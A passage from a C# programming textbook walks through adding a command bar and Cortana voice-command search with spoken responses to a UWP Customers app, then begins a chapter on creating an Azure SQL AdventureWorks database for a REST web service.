culture-specific resources file and bind the Label property
dynamically when the application runs. For more information,
visit the page “Quickstart: Translating UI resources (XAML)” on
the Microsoft website at
https://msdn.microsoft.com/library/windows/apps/xaml/hh965329.aspx
The CommandBar control can contain only a limited set of
controls (controls that implement the ICommandBarElement
interface). This set includes the AppBarButton,
AppBarToggleButton, and AppBarSeparator controls. These
controls are specifically designed to operate within a
CommandBar. If you attempt to add a control such as a button to a
command bar, you will receive the error message “The specified
value cannot be assigned to the collection.”
The UWP app templates include a variety of stock icons (such as
for Previous and Next, shown in the sample code above) that you
can display on an AppBarButton control. You can also define your
own icons and bitmaps.
Each button has a Command property, which is the property that
you can bind to an object that implements the ICommand
interface. In this application, you have bound the buttons to the
PreviousCustomer and NextCustomer commands in the
ViewModel class. When the user clicks either of these buttons at
runtime, the corresponding command will run.
3. On the Debug menu, click Start Debugging.
The Customers form should appear and display the details for John
Sharp. The command bar should be displayed at the top of the form and
contain the Next and Previous buttons, as shown in the following image:
Download from finelybook [email protected]
987
Notice that the Previous button is not available. This is because the
IsAtStart property of the ViewModel is true, and the CanExecute
method of the Command object referenced by the Previous button
indicates that the command cannot run.
4. Click the ellipsis button on the command bar. The labels for the buttons
should appear. These labels will be displayed until you click one of the
buttons on the command bar.
5. On the command bar, click Next.
The details for customer 2, Diana Sharp, should appear, and after a short
delay (of up to one second), the Previous button should become
available. The IsAtStart property is no longer true, so the CanExecute
method of the command returns true. However, the button is not notified
of this change in state until the timer object in the command expires and
triggers the CanExecuteChanged event, which might take up to a second
Download from finelybook [email protected]
988
to occur.
Note If you require a more instantaneous reaction to the change in
state of commands, you can arrange for the timer in the Command
class to expire more frequently. However, avoid reducing the time
by too much because raising the CanExecuteChanged event too
frequently can impact the performance of the UI.
6. On the command bar, click Next again.
7. The details for customer 3, Francesca Sharp, should appear, and after a
short delay of up to one second, the Next button should no longer be
available. This time, the IsAtEnd property of the ViewModel is true, so
the CanExecute method of the Command object for the Next button
returns false, and the command is disabled.
8. Resize the window to display the app in the narrow view and verify that
the app continues to function correctly. The Next and Previous buttons
should step forward and backward through the list of customers.
9. Return to Visual Studio and stop debugging.
Searching for data using Cortana
A key feature of Windows 10 apps is the ability to integrate with the voice-
activated digital assistant, also known as Cortana. Using Cortana, you can
activate applications and pass them commands. A common requirement is to
use Cortana to initiate a search request and have an application respond with
the results of that request. The app can send the results back to Cortana for
display (known as background activation), or the app itself can display the
results (known as foreground activation). In this section, you will extend the
Customers app to enable a user to search for specific customers by name.
You can expand this example to cover other attributes or possibly combine
search elements into more complex queries.
Download from finelybook [email protected]
989
Note The exercises in this section assume that you have enabled
Cortana. To do this, click the Search button on the Windows taskbar. In
the toolbar on the left side of the window, click Settings (the cog icon).
In the Settings window, click the Talk to Cortana tab, and make sure
that Cortana is configured to respond.
Cortana also requires that you have signed in to your computer by
using a Microsoft account, and will prompt you to connect if necessary.
This step is required because speech recognition is handled by an
external service running in the cloud rather than on your local device.
Download from finelybook [email protected]
990
Adding voice activation to an app is a three-stage process:
1. Create a voice-command definition (VCD) file that describes the
commands to which your app can respond. This is an XML file that you
deploy as part of your application.
2. Register the voice commands with Cortana. You typically do this when
the app starts running. You must run the app at least once before
Cortana will recognize it. Thereafter, if Cortana associates a particular
command with your app, it will launch your app automatically. To avoid
cluttering up its vocabulary, Cortana will “forget” commands associated
with an app if the app is not activated for a couple of weeks, and the
commands have to be registered again to be recognized. Therefore, it is
common practice to register voice commands every time the app starts
running—to reset the “forget” counter and give the app another couple
of weeks of grace.
3. Handle voice activation in your app. Your app is passed information
from Cortana about the command that causes the app to be activated. It
is the responsibility of your code to parse this command, extract any
arguments, and perform the appropriate operations. This is the most
complicated part of implementing voice integration.
The following exercises walk through this process using the Customers
app.
Create the voice-command definition (VCD) file for the Customers app
1. In Visual Studio, open the Customers solution in the \Microsoft
Press\VCSBS\Chapter 26\ Cortana folder in your Documents folder.
This version of the Customers app has the same ViewModel that you
created in the previous exercise, but the data source contains details for
many more customers. The customer information is still held in a
List<Customer> object, but this object is now created by the
DataSource class in the DataSource.cs file. The ViewModel class
references this list instead of creating the small collection of three
customers used in the previous exercise.
2. In Solution Explorer, right-click the Customers project, point to Add,
Download from finelybook [email protected]
991
and then click New Item.
3. In the Add New Item - Customers dialog box, in the left pane, click
Visual C#. In the middle pane, scroll down and select the XML File
template. In the Name box, type CustomerVoiceCommands.xml, and
then click Add, as shown in the following image:
Visual Studio generates a default XML file and opens it in the Code and
Text Editor window.
4. Add the following markup shown in bold to the XML file.
Click here to view code image
<?xml version="1.0" encoding="utf-8"?>
<VoiceCommands
xmlns="http://schemas.microsoft.com/voicecommands/1.2">
<CommandSet xml:lang="en-us" Name="CustomersCommands">
<CommandPrefix>Customers</CommandPrefix>
<Example>Show details of John Sharp</Example>
</CommandSet>
</VoiceCommands>
Voice commands are defined in a command set. Each command set has
Download from finelybook [email protected]
992
a command prefix (specified by the CommandPrefix element), which
can be used by Cortana to identify the application at runtime. The
command prefix does not have to be the same as the name of the
application. For example, if your application name is lengthy or contains
numeric characters, Cortana might have difficulty recognizing it, so you
can use the command prefix to provide a shorter and more
pronounceable alias. The Example element contains a phrase that shows
how a user can invoke the command. Cortana displays this example in
response to inquiries such as “What can I say?” or “Help.”
Note The command prefix should reflect the purpose of the
application and should not conflict with other well-known
applications or services. For example, if you specify a command
prefix of “Facebook,” your application is unlikely to pass
verification testing if it is submitted to the Windows Store.
5. If you are not located in the United States, change the xml:lang attribute
of the CommandSet element to reflect your locale. For example, if you
are in the United Kingdom, specify xml:lang=”en-gb”.
This is important. If the language specified does not match your locale,
Cortana will not recognize your voice commands at runtime. The
rationale behind this is that you should specify a separate CommandSet
element for each locale in which your application will run. This enables
you to provide alternative commands for different languages. Cortana
uses the locale of the machine on which the app is running to determine
which command set to use.
6. Add the Command and PhraseTopic elements shown in bold to the
CommandSet element in the XML file:
Click here to view code image
<?xml version="1.0" encoding="utf-8"?>
<VoiceCommands
xmlns="http://schemas.microsoft.com/voicecommands/1.2">
Download from finelybook [email protected]
993
<CommandSet xml:lang="en-us" Name="CustomersCommands">
<CommandPrefix>Customers</CommandPrefix>
<Example>Show details of John Sharp</Example>
<Command Name="showDetailsOf">
<Example>show details of John Sharp</Example>
<ListenFor RequireAppName="BeforeOrAfterPhrase">
show details of
</ListenFor>
<ListenFor RequireAppName="BeforeOrAfterPhrase">
show details for
</ListenFor>
<ListenFor RequireAppName="BeforeOrAfterPhrase">
search for
</ListenFor>
<Feedback>Looking for </Feedback>
<Navigate/>
</Command>
<PhraseTopic Label="customer" Scenario="Search">
<Subject>Person Names</Subject>
</PhraseTopic>
</CommandSet>
</VoiceCommands>
You can add one or more commands to a command set, each of which
can invoke a different operation in your application. Each command has
a unique identifier (the Name attribute). This identifier is passed to the
application that Cortana invokes so that the application can determine
which command the user spoke and thereby determine which operation
to perform.
The text in the Example element is displayed by Cortana if the user
selects your app in response to the query “What can I say?”; Cortana
will display the sample phrase for each of the commands that your app
understands.
The ListenFor element is used by Cortana to recognize the requests that
should invoke this app. You can specify multiple ListenFor phrases to
provide flexibility to the user. In this case, the user can speak three
variations of the same phrase to invoke the command. A phrase spoken
by the user should include either the name of the app or the prefix
specified in the CommandSet element. In this example, the name (or
prefix) can be specified at the beginning or end of the spoken phrase (the
RequireAppName attribute is set to BeforeOrAfterPhrase)—for
example, “Customers, show details of John Sharp” or “Search for John
Download from finelybook [email protected]
994
Sharp in Customers.” The text in the ListenFor phrase is a placeholder
that is governed by the PhraseTopic element (described shortly).
The Feedback element is spoken by Cortana when it recognizes a
request. The customer specified by the user is substituted into the
placeholder.
The Navigate element indicates that Cortana will start the app in the
foreground. You can optionally specify which page should be displayed
(if the app contains multiple pages) as the Target attribute of this
element. The Customers app contains only a single page, so the Target
attribute is not specified. If the app is intended to run in the background
and pass data back for Cortana to display, you specify a
VoiceCommandService element instead of Navigate. For more
information, visit the page “Launch a background app with voice
commands in Cortana” online at
https://msdn.microsoft.com/library/dn974228.aspx.
The PhraseTopic element is used to define a placeholder in spoken
phrases. The Label attribute specifies with which placeholder the
element is associated. At runtime, Cortana substitutes the word or words
spoken at this point in the phrase into the phrase topic. The Scenario
attribute and the Subject elements are optional and provide hints to
Cortana about how to interpret these words. In this example, the words
are being used as search arguments and constitute human names. You
can specify other scenarios such as Short Message or Natural Language,
in which case Cortana may attempt to parse these words differently. You
can also specify alternative subjects such as addresses, phone number, or
city and state.
7. On the File menu, click Save CustomerVoiceCommands.xml, and then
close the file.
8. In Solution Explorer, select the CustomerVoiceCommands.xml file. In
the Properties window, change the Copy To Output Directory property
to Copy If Newer.
This action causes the XML file to be copied to the application folder if
it changes and be deployed with the app.
Download from finelybook [email protected]
995
The next step is to register the voice commands with Cortana when the
app runs. You can do this in the code for the OnLaunched method in the
App.xaml.cs file. The OnLaunched method occurs every time a Launched
event occurs when the application starts running. When the application shuts
down, you can save information about the application state (which customer
the user was viewing, for example), and you can use this event to restore the
state of the application (by displaying the same customer) when the
application starts up again. You can also use this event to perform operations
that should occur every time the application runs.
Register voice commands with Cortana
1. In Solution Explorer, expand App.xaml and then double-click
App.xaml.cs to display the file in the Code and Text Editor window.
2. Add the following using directives to the list at the top of the file.
Click here to view code image
using Windows.Storage;
using Windows.ApplicationModel.VoiceCommands;
using System.Diagnostics;
3. Find the OnLaunched method and enable asynchronous operations by
adding the async modifier:
Click here to view code image
protected async override void
OnLaunched(LaunchActivatedEventArgs e)
{
...
}
4. Add the code shown below in bold to the end of the OnLaunched
method:
Click here to view code image
protected async override void
OnLaunched(LaunchActivatedEventArgs e)
{
...
// Ensure the current window is active
Window.Current.Activate();
try
{
Download from finelybook [email protected]
996
var storageFile = await Package.Current.
InstalledLocation.GetFileAsync(@"CustomerVoiceCommands.xml");
await VoiceCommandDefinitionManager.
InstallCommandDefinitionsFromStorageFileAsync(storageFile);
}
catch (Exception ex)
{
Debug.WriteLine($"Installing Voice Commands Failed:
{ex.ToString()}");
}
}
The first statement retrieves the XML file that contains the voice-
command definitions from the application folder. This file is then passed
to the VoiceCommandDefinitionManager manager. This class provides
the interface to the operating system for registering and querying voice-
command definitions. The static
InstallCommandDefinitionsFromStorageFileAsync method registers
voice commands found in the specified storage file. If an exception
occurs during this process, the exception is logged, but the application is
allowed to continue running (it just won’t respond to voice commands).
The final step of the process is to have your app respond when Cortana
recognizes a voice command intended for the app. In this case, you can
capture the Activated event by using the OnActivated method of the App
class. This method is passed a parameter of type IActivatedEventArgs, which
contains information describing data passed to the app, including the details
of any voice-activation commands.
Handle voice activation in the Customers app
1. In the Code and Text Editor window, add the OnActivated event method
shown here to the end of the App class, after the OnSuspending method:
Click here to view code image
protected override void OnActivated(IActivatedEventArgs args)
{
base.OnActivated(args);
}
This method invokes the overridden OnActivated method to perform any
default activation processing required before handling voice activation.
2. Add the following if statement block shown in bold to the OnActivated
Download from finelybook [email protected]
997
method:
Click here to view code image
protected override void OnActivated(IActivatedEventArgs args)
{
base.OnActivated(args);
if (args.Kind == ActivationKind.VoiceCommand)
{
var commandArgs = args as
VoiceCommandActivatedEventArgs;
var speechRecognitionResult = commandArgs.Result;
var commandName =
speechRecognitionResult.RulePath.First();
}
}
This block determines whether the app has been activated by Cortana as
the result of a voice command. If so, the args parameter contains a
VoiceCommandActivatedEventArgs object. The Result property contains
a speechRecognitionResult object that contains information about the
command. The RulePath list in this object contains the elements of the
phrase that triggered activation, and the first item in this list contains the
name of the command recognized by Cortana. In the Customers
application, the only command defined in the
CustomerSearchCommands.xml file is the showDetailsOf command.
3. Add the following code shown in bold to the if statement block in the
OnActivated method:
Click here to view code image
if (args.Kind == ActivationKind.VoiceCommand)
{
...
var commandName = speechRecognitionResult.RulePath.First();
string customerName = "";
switch (commandName)
{
case "showDetailsOf":
customerName =
speechRecognitionResult.SemanticInterpretation.
Properties["customer"].FirstOrDefault();
break;
default:
Download from finelybook [email protected]
998
break;
}
}
The switch statement verifies that the voice command is the
showDetailsOf command. If you add more voice commands, you should
extend this switch statement. If the voice data contains some other
unknown command, it is ignored.
The SemanticInterpretation property of the speechRecognitionResult
object contains information about the properties of the phrase
recognized by Cortana. Commands for the Customers app include the
placeholder, and this code retrieves the text value for this placeholder as
spoken by the user and interpreted by Cortana.
4. Add the following code to the end of the OnActivated method, after the
switch statement:
Click here to view code image
protected override void OnActivated(IActivatedEventArgs args)
{
...
if (args.Kind == ActivationKind.VoiceCommand)
{
...
switch (commandName)
{
...
}
Frame rootFrame = Window.Current.Content as Frame;
if (rootFrame == null)
{
rootFrame = new Frame();
rootFrame.NavigationFailed += OnNavigationFailed;
Window.Current.Content = rootFrame;
}
rootFrame.Navigate(typeof(MainPage), customerName);
Window.Current.Activate();
}
}
The first block here is boilerplate code that ensures that an application
window is open to display a page. The second block displays the
MainPage page in this window. The Navigate method of the Frame
Download from finelybook [email protected]
999
object causes MainPage to become the active page. The second
parameter is passed as an object that can be used by the page to provide
context information about what to display. In this code, the parameter is
a string containing the customer name.
5. Open the ViewModel.cs file in the Code and Text Editor window and
find the ViewModel constructor. The code in this constructor has been
refactored slightly, and the statements that initialize the view state have
been moved to a separate method named _initializeState, as shown here:
Click here to view code image
public ViewModel()
{
_initializeState();
this.customers = DataSource.Customers;
}
private void _initializeState()
{
this.currentCustomer = 0;
this.IsAtStart = true;
this.IsAtEnd = false;
this.NextCustomer = new Command(this.Next, () =>
this.customers.Count > 1 && !this.IsAtEnd);
this.PreviousCustomer = new Command(this.Previous, () =>
this.customers.Count > 0 && !this.IsAtStart);
}
6. Add another constructor to the ViewModel class. This constructor should
take a string containing a customer name and filter the records in the
data source by using this name, as follows:
Click here to view code image
public ViewModel(string customerName)
{
_initializeState();
string[] names = customerName.Split(new[] {' '}, 2,
StringSplitOptions.RemoveEmptyEntries);
this.customers =
(from c in DataSource.Customers
where string.Compare(c.FirstName.ToUpper(),
names[0].ToUpper()) == 0 &&
(names.Length > 1 ?
string.Compare(c.LastName.ToUpper(),
names[1].ToUpper()) == 0 : true)
select c).ToList();
Download from finelybook [email protected]
1000
}
A customer’s name can contain two parts: a first name and a last name.
The Split method of the String class can break a string into substrings
based on a list of separator characters. In this case, the Split method
divides the customer name into a maximum of two pieces if the user
provides a first name and a last name separated by one or more space
characters. The results are stored in the names array. The LINQ query
uses this data to find all customers where the first name matches the first
item in the names array and the last name matches the second item in the
names array. If the user specifies a single name, the names array will
contain only one item, and the LINQ query matches only against the
first name. To remove any case sensitivity, all string comparisons are
performed against the upper case versions of the strings. The resulting
list of matching customers is assigned to the customers list in the view
model.
7. Return to the MainPage.xaml.cs file in the Code and Text Editor
window.
8. Add the OnNavigatedTo method shown here to the end of the MainPage
class, after the constructor:
Click here to view code image
public sealed partial class MainPage : Page
{
public MainPage()
{
...
}
protected override void OnNavigatedTo(NavigationEventArgs e)
{
string customerName = e.Parameter as string;
if (!string.IsNullOrEmpty(customerName))
{
ViewModel viewModel = new ViewModel(customerName);
this.DataContext = viewModel;
}
}
}
The OnNavigatedTo method runs when the application displays
(navigates to) this page by using the Navigate method. Any arguments
Download from finelybook [email protected]
1001
provided appear in the Parameter property of the NavigationEventArgs
parameter. This code attempts to convert the data in the Parameter
property to a string, and if it is successful, it passes this string as the
customer name to the ViewModel constructor. The resulting ViewModel
(which should contain only customers that match this name) is then set
as the data context for the page.
9. On the Build menu, click Build Solution and verify that the solution
compiles successfully.
As a final bit of polish, the next exercise adds a set of icons that Windows
10 and Cortana can use to represent the app visually. These icons are more
colorful than the stock gray-and-white cross images provided by the Blank
App template.
Add icons to the Customers app
1. In Solution Explorer, right-click the Assets folder, point to Add, and
then click Existing Item.
2. In the Add Existing Item - Customers dialog box, move to the
\Microsoft Press\VCSBS\ Chapter 26\Resources folder in your
Documents folder, select the three AdventureWorks logo files in this
folder, and then click Add.
3. In Solution Explorer, double-click the Package.appxmanifest file to
display it in the Manifest Designer window.
4. Click the Visual Assets tab. Then, in the left pane, click Medium Tile.
5. Scroll down to the Preview Images section, and in the list of Scaled
Assets click the ellipsis button directly below the Scale 100 image.
Browse to the Assets folder, click AdventureWorksLogo150x150.png,
and then click Open. The image for this asset should be displayed in the
box.
6. In the left pane, click App Icon. Scroll down to the Preview Images
section, and in the list of Scaled Assets click the ellipsis button directly
below the Scale 100 image. Browse to the Assets folder, click
AdventureWorksLogo44x44.png, and then click Open.
7. In the left pane, click Splash Screen. Scroll down to the Preview Images
Download from finelybook [email protected]
1002
section, and in the list of Scaled Assets click the ellipsis button directly
below the Scale 100 image. Browse to the Assets folder, click
AdventureWorksLogo620x300.png, and then click Open.
8. On the Debug menu, click Start Without Debugging to build and run the
application. Verify that the splash screen appears momentarily when the
app starts running, and then the details of the customer named Orlando
Gee are displayed. You should be able to move back and forth through
the list of customers as before. By running the app, you have also
registered the voice commands that Cortana can use to invoke the app.
9. Close the app.
You can now test voice activation for the Customers app.
Test the search capability
1. Activate Cortana, and then speak the following query or type it in the
search box:
Customers show details for Brian Johnson
Note Remember to alert Cortana first with the “Hey, Cortana”
prompt if you are talking rather than typing. Cortana should
respond in the same way regardless of whether you speak a
command or type it.
Cortana should recognize that this command should be directed to the
Customers app.
Download from finelybook [email protected]
1003
Cortana will then launch the Customers app and display the details for
Brian Johnson. Notice that the Previous and Next buttons in the
command bar are not available because there is only one matching
customer.
Download from finelybook [email protected]
1004
2. Return to Cortana, and then speak the following query or type it in the
search box:
Search for John in Customers
This time, the app finds all customers who have the first name, John.
More than one match is returned, and you can use the Previous and Next
buttons in the command bar to move between the results.
3. Experiment with other searches. Notice that you can use the forms
“Search for …,” “Show details for …,” and “Show details of …” with
the app name specified at the start of the command or at the end
(prefixed by “in”). Notice that if you type a query with a different form,
Download from finelybook [email protected]
1005
Cortana will not understand it and will instead perform a Bing search.
4. When you have finished, return to Visual Studio.
Providing a vocal response to voice commands
In addition to sending voice commands to an app, you can make an app
respond vocally. To do this, UWP apps make use of the speech synthesis
features provided by Windows 10. Implementing this functionality is actually
reasonably straightforward, but there is one piece of etiquette that you should
observe: an app should respond vocally only if it is spoken to. If the user
types a phrase instead of uttering it, the app should remain silent. Fortunately,
you can detect whether a command is spoken or typed by examining the
commandMode property returned by performing the semantic interpretation
of the command, as follows:
Click here to view code image
SpeechRecognitionResult speechRecognitionResult = ...;
string commandMode = speechRecognitionResult.SemanticInterpretation.
Properties["commandMode"].FirstOrDefault();
The value of the commandMode property is a string that will contain
either “text” or “voice” depending on how the user entered the command. In
the following exercise, you will use this string to determine whether the app
should respond vocally or remain silent.
Add a voice response to search requests
1. In Visual Studio, open the App.xaml.cs file and display it in the Code
and Text Editor window.
2. In the OnActivated method, add the following statement shown in bold:
Click here to view code image
protected override void OnActivated(IActivatedEventArgs args)
{
...
if (args.Kind == ActivationKind.VoiceCommand)
{
var commandArgs = args as
VoiceCommandActivatedEventArgs;
var speechRecognitionResult = commandArgs.Result;
var commandName =
Download from finelybook [email protected]
1006
speechRecognitionResult.RulePath.First();
string commandMode =
speechRecognitionResult.SemanticInterpretation.
Properties["commandMode"].FirstOrDefault();
string customerName = "";
...
}
}
3. At the end of the method, change the statement that calls the Navigate
method so that it passes in a NavigationArgs object as the second
parameter. This object wraps the customer name and the command
mode.
Click here to view code image
protected override void OnActivated(IActivatedEventArgs args)
{
...
if (args.Kind == ActivationKind.VoiceCommand)
{
...
switch (commandName)
{
...
}
...
rootFrame.Navigate(typeof(MainPage),
new NavigationArgs(customerName, commandMode));
Window.Current.Activate();
}
}
Visual Studio will report that the NavigationArgs type cannot be found.
This happens because the NavigationArgs type does not exist yet; you
need to create it.
4. Right-click the reference to the NavigationArgs object in the code, and
then click Quick Actions and Refactorings. In the Quick Actions popup,
click Generate Class For NavigationArgs In the new file, as shown here:
Download from finelybook [email protected]
1007
This action creates a new file, called NavigationArgs.cs, that contains a
class with private fields named customerName and commandMode,
together with a public constructor that populates these fields. You must
modify this class to make the fields accessible to the outside world. The
best way to achieve this is to convert the fields into read-only properties.
5. In Solution Explorer, double-click the NavigationArgs.cs file to display
it in the Code and Text Editor window.
6. Modify the customerName and commandMode fields to make them
read-only fields that can be accessed by other types in the application, as
shown in bold in the following code:
Click here to view code image
internal class NavigationArgs
{
internal string commandMode { get; }
internal string customerName { get; }
public NavigationArgs(string customerName, string
commandMode)
{
this.customerName = customerName;
this.commandMode = commandMode;
}
}
7. Return to MainPage.xaml.cs in the Code and Text Editor window and
locate the OnNavigatedTo method. Make this method async, and modify
the code in the body of his method as follows:
Download from finelybook [email protected]
1008
Click here to view code image
protected override async void OnNavigatedTo(NavigationEventArgs
e)
{
NavigationArgs args = e.Parameter as NavigationArgs;
if (args != null)
{
string customerName = args.customerName;
ViewModel viewModel = new ViewModel(customerName);
this.DataContext = viewModel;
if (args.commandMode == "voice")
{
if (viewModel.Current != null)
{
await Say($"Here are the details for ");
}
else
{
await Say($" was not found");
}
}
}
}
Note that the Say method has not been implemented yet. You will create
this method shortly.
8. Add the following using directives to the list at the top of the file:
Click here to view code image
using Windows.Media.SpeechSynthesis;
using System.Threading.Tasks;
9. Add the Say method shown here to the end of the MainPage class:
Click here to view code image
private async Task Say(string message)
{
MediaElement mediaElement = new MediaElement();
var synth = new SpeechSynthesizer();
SpeechSynthesisStream stream =
await synth.SynthesizeTextToStreamAsync(message);
mediaElement.SetSource(stream, stream.ContentType);
mediaElement.Play();
}
The SpeechSynthesizer class in the Windows.Media.SpeechSynthesis
Download from finelybook [email protected]
1009
namespace can generate a media stream containing speech synthesized
from text. This stream is then passed to a MediaElement object, which
plays it.
10. On the Debug menu, click Start Without Debugging to build and run the
application.
11. Activate Cortana, and then speak the following query:
Customers show details for Brian Johnson
Cortana should respond by displaying the details for Brian Johnson in
the Customers app and saying “Here are the details for Brian Johnson.”
12. Type the following query into the Cortana search box:
Customers show details for John
Verify that this time the application remains mute after displaying the
list of customers with the first name John.
13. Experiment by performing other queries by typing and with your voice.
Close the app when you are finished.
Summary
In this chapter, you learned how to display data on a form by using data
binding. You saw how to set the data context for a form and how to create a
data source that supports data binding by implementing the
INotifyPropertyChanged interface. You also learned how to use the Model–
View–ViewModel pattern to create a UWP app, and you saw how to create a
ViewModel with which a view can interact with a data source by using
commands. Finally, you learned how to integrate an app with Cortana to
provide voice-activated search functionality.
Quick reference
To
Do this
Bind the property of
Use a data-binding expression in the XAML markup
Download from finelybook [email protected]
1010
a control to the
property of an object
of the control. For example:
Click here to view code image
<TextBox ... Text="{Binding FirstName}" .../>
Enable an object to
notify a binding of a
change in a data
value
Implement the INotifyPropertyChanged interface in
the class that defines the object and raise the
PropertyChanged event each time a property value
changes. For example:
Click here to view code image
class Customer : INotifyPropertyChanged
{
...
public event PropertyChangedEventHandler
PropertyChanged;
protected virtual void OnPropertyChanged(
string propertyName)
{
if (PropertyChanged != null)
{
PropertyChanged(this,
new
PropertyChangedEventArgs(propertyName));
}
}
}
Enable a control that
uses data binding to
update the value of
the property to which
it is bound
Configure the data binding as two-way. For example:
Click here to view code image
<TextBox ... Text="{Binding FirstName,
Mode=TwoWay}" .../>
Separate the business
logic that runs when
a user clicks a Button
control from the user
interface that
contains the Button
control
Use a ViewModel that provides commands
implemented with the ICommand interface, and bind
the Button control to one of these commands. For
example:
Click here to view code image
<Button x:Name="nextCustomer" ... Command="
{Binding
Path=NextCustomer}"/>
Support searching in
Add a voice-command definition (VCD) file to the
Download from finelybook [email protected]
1011
a UWP app by using
Cortana
application that specifies the commands to be
recognized, and then register these commands when
the application starts running by using the static
InstallCommandDefinitionsFromStorageFileAsync
method of the VoiceCommandDefinitionManager
class.
At runtime, capture the Activated event. If the
ActivationKind value of the IActivatedEventArgs
parameter to this event indicates a voice command,
then parse the speech recognition data in the Result
property of this parameter to determine the action to
take.
Download from finelybook [email protected]
1012
CHAPTER 27
Accessing a remote database from a
Universal Windows Platform app
After completing the chapter, you will be able to:
Use the Entity Framework to create an entity model that can retrieve
and modify information held in a database.
Create a Representational State Transfer (REST) web service that
provides remote access to a database through an entity model.
Fetch data from a remote database by using a REST web service.
Insert, update, and delete data in a remote database by using a REST
web service.
Chapter 26, “Displaying and searching for data in a Universal Windows
Platform app,” shows how to implement the Model–View–ViewModel
(MVVM) pattern. It also explains how to separate the business logic of an
app from the user interface (UI) by using a ViewModel class that provides
access to the data in the model and implements commands that the UI can use
to invoke the logic of the app. Chapter 26 also illustrates how to use data
binding to display the data presented by the ViewModel and how the UI can
update this data. This all results in a fully functional Universal Windows
Platform (UWP) app.
In this chapter, you will turn your attention to the model aspect of the
MVVM pattern. In particular, you will see how to implement a model that a
UWP app can use to retrieve and update data in a remote database.
Download from finelybook [email protected]
1013
Retrieving data from a database
So far, the data you have used has been confined to a simple collection
embedded in the ViewModel of the app. In the real world, the data displayed
and maintained by an app is more likely to be stored in a data source such as
a relational database.
UWP apps cannot directly access a relational database by using
technologies provided by Microsoft (although some third-party database
solutions are available). This might sound like a severe restriction, but there
are sensible reasons for this limitation. Primarily, it eliminates dependencies
that a UWP app might have on external resources, making the app a
standalone item that can be easily packaged and downloaded from the
Windows Store without requiring users to install and configure a database-
management system on their computer. Additionally, many Windows 10
devices are resource constrained and don’t have the memory or disk space
available to run a local database-management system. However, many
business apps will still have a requirement to access a database; to address
this scenario, you can use a web service.
Web services can implement a variety of functions, but one common
scenario is to provide an interface with which an app can connect to a remote
data source to retrieve and update data. A web service can be located almost
anywhere, from the computer on which the app is running to a web server
hosted on a computer on a different continent. As long as you can connect to
the web service, you can use it to provide access to the repository of your
information. Microsoft Visual Studio provides templates and tools with
which you can build a web service very quickly and easily. The simplest
strategy is to base the web service on an entity model generated by using the
Entity Framework, as shown in the following diagram:
Download from finelybook [email protected]
1014
The Entity Framework is a powerful technology with which you can
connect to a relational database. It can reduce the amount of code that most
developers need to write to add data access capabilities to an app. This is
where you will start, but first, you need to set up the AdventureWorks
database, which contains the details of AdventureWorks customers.
Note There is not sufficient space in this book to go into great detail on
how to use the Entity Framework, and the exercises in this section walk
you through only the most essential steps to get started. If you want
more information, look at “Entity Framework” on the Microsoft website
at http://msdn.microsoft.com/data/aa937723.
To make the scenario more realistic, the exercises in this chapter show
you how to create the database in the cloud by using Microsoft Azure SQL
Database and how to deploy the web service to Azure. This architecture is
common to many commercial apps, including e-commerce applications,
Download from finelybook [email protected]
1015
mobile banking services, and even video streaming systems.
Note The exercises require that you have an Azure account and
subscription. If you don’t already have an Azure account, you can sign
up for a free trial account at https://azure.microsoft.com/pricing/free-
trial/. Additionally, Azure requires that you have a valid Microsoft
account with which it can associate your Azure account. You can sign
up for a Microsoft account at https://signup.live.com/.
Create an Azure SQL Database server and install the AdventureWorks
sample database
1. Using a web browser, connect to the Azure portal at
https://portal.azure.com. Sign in using your Microsoft account.
2. In the toolbar on the left of the portal, click New.
3. On the New page, click Databases, and then click SQL Database.
4. In the SQL Database pane, perform the following tasks:
a. In the Name box, type AdventureWorks.
b. Leave the Subscription box set to the name of your Azure
subscription
c. In the Resource group box, click Create New, and type awgroup.
d. In the Select source drop-down list box, click
Sample(AdventureWorksLT).
e. In the Server section, click Configure required settings. In the New
Server pane, type a unique name for your server. (Use your company
name or even your own name; I used csharpstepbystep2017. If the
name you enter has been used by someone else, you will be alerted, in
which case enter another name.) Enter a name and password for the
administrator login (make a note of these items; I used JohnSharp,
but I am not going to tell you my password), select the location
closest to you, and then click Select to return to the SQL Database
Download from finelybook [email protected]
1016
pane.
f. Under the prompt “Want to use SQL elastic pool?” click Not now.
g. Click Pricing Tier. In the Choose Your Pricing Tier pane, click Basic
and then click Apply. (This is the cheapest option if you are paying
for the database yourself, and it will suffice for the exercises in this
chapter. If you are building a large-scale commercial app, you will
probably need to use a Premium pricing tier, which provides much
more space and higher performance but at a higher cost.)
Important Do not select any pricing tier other than Basic, and do
not enable SQL elastic pool, unless you want to receive a
potentially significant bill at the end of the month. For information
about SQL Database pricing, see https://azure.microsoft.com/en-
us/pricing/details/sql-database/.
Download from finelybook [email protected]
1017
h. Click Create, and wait while the database server and database are
created. You can monitor progress by clicking Notifications in the
toolbar.
5. In the toolbar on the left of the Azure portal, click All resources.
6. On the Browse page, in the All Resources pane, click your SQL server
(not the AdventureWorks SQL database).
Download from finelybook [email protected]
1018
7. In the toolbar on the left of the pane, click Firewall/Virtual Networks.
8. In the Firewall/Virtual Networks pane, click Add client IP:
9. Click Save. Verify that the message “Successfully updated server
firewall rules” appears, and then click OK.
Note These steps are important. Without them, you will not be able
to connect to the database from applications running on your
computer. You can also create firewalls that span a range of IP
addresses if you need to open access to a set of computers.
The sample AdventureWorks database contains a table named Customer
in the SalesLT schema. This table includes the columns containing the data
presented by the Customers UWP app and also several others. Using the
Entity Framework, you can choose to ignore columns that are not relevant,
but you will not be able to create new customers if any of the columns you
ignore do not allow nulls and do not have default values. In the Customer
Download from finelybook [email protected]
1019
table, this restriction applies to the NameStyle, PasswordHash, and
PasswordSalt columns (used for encrypting users’ passwords). To avoid
complications and to enable you to focus on the functionality of the app
itself, in the next exercise you will remove these columns from the Customer
table.
Remove unneeded columns from the AdventureWorks database
1. In the Azure portal, in the left pane, click All Resources, and then click
the AdventureWorks database.
2. In the toolbar above the AdventureWorks SQL Database pane, click
Tools, and then click Open In Visual Studio.
3. In the Open In Visual Studio pane, click Open In Visual Studio.
4. If the Did You Mean To Switch Applications? message appears, click
Yes.
Visual Studio will start up and prompt you to connect to the database.
5. In the Connect dialog box, enter the administrator password that you
specified earlier, and then click Connect.
Download from finelybook [email protected]
1020
Visual Studio connects to the database, which appears in the SQL Server
Object Explorer window on the left side of the Visual Studio IDE.
6. In the SQL Server Object Explorer pane, expand the AdventureWorks
database, expand Tables, expand SalesLT.Customer, and then expand
Columns.
The columns in the table are listed. The three columns that are not used
by the application and that disallow null values must be removed.
Download from finelybook [email protected]
1021
